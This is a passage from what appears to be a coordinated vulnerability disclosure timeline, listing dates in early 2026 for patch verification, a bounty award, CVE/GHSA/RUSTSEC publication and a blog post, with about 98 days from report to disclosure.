| Feb 13, 2026 | Received and verified patch for Bugs 2 & 3 |
| Feb 25, 2026 | Received and verified patch for Bug 4 |
| Mar 3, 2026 | Bounty awarded |
| Mar 5, 2026 | CVEs, GHSAs, and RUSTSECs published |
| Mar 9, 2026 | Coordinated blog publication |

Total: ~98 days from first report to public disclosure.